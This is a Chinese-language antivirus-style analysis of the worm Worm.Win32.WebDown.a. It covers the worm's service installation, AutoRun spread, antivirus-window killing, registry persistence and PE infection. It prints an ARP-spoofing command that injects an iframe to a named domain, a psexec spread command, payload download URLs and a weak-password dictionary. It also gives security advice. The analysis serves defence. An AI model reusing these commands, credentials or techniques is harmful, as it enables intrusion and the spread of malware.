Worm.Win32.WebDown.a:病毒信息,清除方法,檢查運行狀態,初始化

Worm.Win32.WebDown.a是一個蠕蟲型病毒，通過枚舉區域網路地址、獲取被感染者當前的連線、下載ip地址信息的方式獲取ip地址，並對這些地址嘗試進行傳播。病毒同時下載程式進行運行。病毒由VC6語言編寫，加殼保護。

基本介紹

中文名：Worm.Win32.WebDown.a
類型：蠕蟲型病毒
危險等級：★★★
截獲時間 ：2007-12-20
入庫版本：20.23.32
破壞手段：網路傳播、下載

病毒信息,清除方法,檢查運行狀態,初始化操作,註冊為服務運行,病毒的服務過程,在固定磁碟中建立AutoRun實現自啟動,視窗訊息處理,破壞反病毒軟體和複寫檔案,病毒的感染代碼,安全建議,

病毒信息

病毒名稱：Worm.Win32.WebDown.a

類型：感染型病毒

感染的作業系統：Windows所有版本系統

威脅情況：

傳播級別：高

全球化傳播態勢：低

清除難度：困難

破壞力：高

清除方法

檢查運行狀態

病毒運行後首先檢測自己的是否是以“%system32%\IME\svchost.exe”運行，如不是則進行複製自己等初始化操作，反之則以服務方式運行。

初始化操作

病毒刪除“%system32%\IME\svchost.exe”，然後複製自己為該檔案，並將屬性設定為系統、隱藏，然後病毒調用CreateProcessA啟動“%system32%\IME\svchost.exe”。

病毒啟動“%system32%\IME\svchost.exe”後，釋放批處理檔案rs.bat並執行，以此來刪除自己。

註冊為服務運行

病毒通過調用StartServiceCtrlDispatcher、CreateServiceA等函式，註冊名稱為“Alerter COM+”、目標為“%system32%\IME\svchost.exe”的服務，然後調用StartServiceA啟動服務。

病毒的服務過程

病毒調用CreateMutexA嘗試生成名為“"Alerter COM+”的互斥量，如失敗則退出，以此來保證只有一個服務實例在運行。

病毒啟動4個工作執行緒嘗試進行網路傳播和下載（詳細見後面）。

病毒根據標誌決定是否對本地固定邏輯盤建立AutoRun機制（詳細見後面）。

病毒註冊並生成視窗類名為“WebDown”、視窗名為“Alerter COM+”的隱藏視窗，並啟動訊息循環，然後向該視窗傳送WM_DEVICECHANGE訊息。

在固定磁碟中建立AutoRun實現自啟動

病毒根據標誌（寫在病毒內，推測為生成病毒時設定的）決定是否對固定硬碟建立自動運行機制。

如標誌為建立，病毒對c到z邏輯盤調用GetDriveTypeA ，對類型為DRIVE_FIXED的固定邏輯盤建立自動運行機制。

病毒複製自己到該邏輯盤根目錄下，名稱為“setup.exe”，並生成AutoRun.inf檔案以達到自動運行，病毒將setup.exe和AutoRun.inf的檔案屬性設定為系統和隱藏。

視窗訊息處理

在視窗循環中，病毒處理如下訊息：

WM_CLOSE、WM_DESTROY訊息，病毒調用默認視窗處理過程。

WM_CREATE訊息，在視窗生成的時候，病毒調用SetTimer建立兩個Timer，間隔為1秒和20分鐘，回調方式為接收WM_TIMER訊息。

WM_TIMER訊息，病毒沒隔1秒調用破壞反病毒軟體和複製自己的代碼（詳細見後面），每隔20分鐘嘗試下載http://www. XXXXX.cn/jj/svch0st.exe為本地%system32%\down.exe並運行。

WM_DEVICECHANGE訊息，病毒通過處理該訊息得到新插入的可移動設備，並對該設備進行感染（寫入病毒並建立AutoRun機制）。

破壞反病毒軟體和複寫檔案

病毒在通過處理WM_TIMER訊息，每隔1秒檢測並破壞反病毒軟體。病毒通過調用GetCursorPos、WindowFromPoint、GetParent等函式獲取當前游標下的視窗及其頂層父視窗，檢測其視窗標題中是否是或包含如下內容：

Windows 任務管理器、安全衛士、掃描、專殺、註冊表、Process、進程、木馬、防禦、防火牆、病毒、檢測、Firewall、virus、anti、金山、江民、卡巴斯基、worm、防毒

如包含這些內容，病毒通過向其傳送WM_DESTROY、WM_CLOSE訊息來破壞這些視窗，以此來破壞反病毒軟體的運行。

病毒通過處理WM_TIMER訊息，每隔1秒複製自己並複寫註冊表，以保護自己。病毒將自己複製為%system32%下的internt.exe和progmon.exe，並寫入如下註冊表信息：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

\Advanced\Folder\Hidden\SHOWALL "CheckedValue" = 0X00000000

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run

"Internt" = %SYSTEM%\INTERNT.EXE

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run

"Program file" = %SYSTEM%\PROGMON.EXE

工作執行緒1：

病毒嘗試下載http://www.XXXXX.cn/jj/conn.exe為本地%system32%\BindF.exe並運行。

工作執行緒2：

病毒從http://www. XXXXX.cn/jj/下載如下檔案到%system32%\目錄：

ArpW.exe、nogui.exe、wpcap.dll、packet.dll、wanpacket.dll、arp.exe

病毒獲取當前網段(例如193.168.0.55)，並將最後一個欄位替換為%s2-%s255，然後以如下參數啟動ArpW.exe。

“ArpW.exe -idx 0 -ip 193.168.0.2-255 -port 80 -insert "<iframe src='http://www.1988712.cn/jj/index.htm' width=0 height=0>"”

病毒通過下載的Arp欺騙病毒，將代碼插入區域網路中的http包中。

工作執行緒3：

病毒從病毒從http://www. XXXXX.cn/jj/下載psexec.exe和server.exe到本地%system32%目錄。

在此執行緒中，病毒每隔30分鐘循環執行如下代碼感染網路：

（1）感染區域網路計算機。病毒獲取本機ip後以此遍曆局域網，通過自帶的用戶名和密碼字典（見後面）嘗試將psexec.exe和server.exe寫入區域網路中其它計算機的%system32%目錄，然後以如下命令行啟動psexec.exe。

"%system32%\psexec.exe \\192.168.0.2 -u 用戶名 -p "密碼" -c %system32%\servrr.exe -d"

（2）感染指定ip的計算機。病毒下載"http://union.itlearner.com/ip/getip.asp"，並通過在其中搜尋“input name=\"ip\”來獲取ip地址，然後利用用戶名和密碼字典嘗試對該ip地址的計算機寫入psexec.exe和server.exe並啟動運行。

（3）感染當前連線的計算機。病毒通過調用GetTcpTable、GetUdpTable等函式獲取當前連線的計算機的ip地址，然後利用用戶名和密碼字典嘗試對該ip地址的計算機寫入psexec.exe和server.exe並啟動運行。

用戶名和密碼字典如下：

用戶名：administrator、admin、guest、alex、home、love、user、game、movie、time、yeah、money、xpuser

密碼：NULL、password、123456、qwerty、abc123、memory、12345678、88888、5201314、1314520、asdfgh、angel、asdf、baby、woaini

工作執行緒4：

病毒每隔1秒，循環嘗試下載http://www. XXXXX.cn/jj/svch0st.exe到本機%system32%並運行。

病毒的感染代碼

在病毒體中包含了感染代碼，但病毒本身並未調用。該感染代碼中存在api地址硬編碼等問題，在運行時會出現問題。

在感染代碼中保護如下操作：

病毒首先複製自己為%system32\drivers\svchost.exe。

病毒將自己複製到如下目錄，名稱為隨機檔案名稱.exe：

%system32\drivers\、%system32\dllcache\、%system32\IME\

c:\Program Files\Common Files\Microsoft Shared\、

c:\Program Files\Internet Explorer\Connection Wizard\、

c:\Program Files\Windows Media Player\、

c:\WINDOWS\addins\、

c:\WINDOWS\system\

病毒遍歷c到z的邏輯盤，對所有目錄進行感染，但排除保護如下字元串的目錄：

Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、ComPlus Applications;Messenger、WINNT、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Messenger、Microsoft Frontpage、Movie Maker、WINDOWS。

病毒只感染後綴名為exe的pe執行檔，感染時病毒在被感染檔案的代碼節的最後的內容為0的地方（為檔案對齊補的）寫入病毒代碼，並將pe頭中入口點改為指向病毒代碼。

在感染的病毒代碼中，病毒調用CreateProcessA（該函式地址為感染時寫入的硬編碼）啟動“C:\WINDOWS\system32\drivers\mmaou.exe”（感染時寫入，檔案為感染時複製的病毒本身），然後通過記錄的原入口點跳回原程式正常入口點執行。

安全建議

1 安裝正版防毒軟體、個人防火牆和卡卡上網安全助手,並及時升級，瑞星防毒軟體每天至少升級三次。

2 使用“瑞星系統安全漏洞掃描”，打好補丁，彌補系統漏洞。

3 不瀏覽不良網站，不隨意下載安裝可疑外掛程式。

4 不接收QQ、MSN、Emial等傳來的可疑檔案。

5 上網時打開防毒軟體實時監控功能。

6 把網銀、網遊、QQ等重要軟體加入到“瑞星帳號保險柜”中，可以有效保護密碼安全。

清除辦法：

瑞星防毒軟體清除辦法：

安裝瑞星防毒軟體，升級到20.23.32版以上，對電腦進行全盤掃描，按照軟體提示進行操作，即可徹底查殺。

Worm.Win32.WebDown.a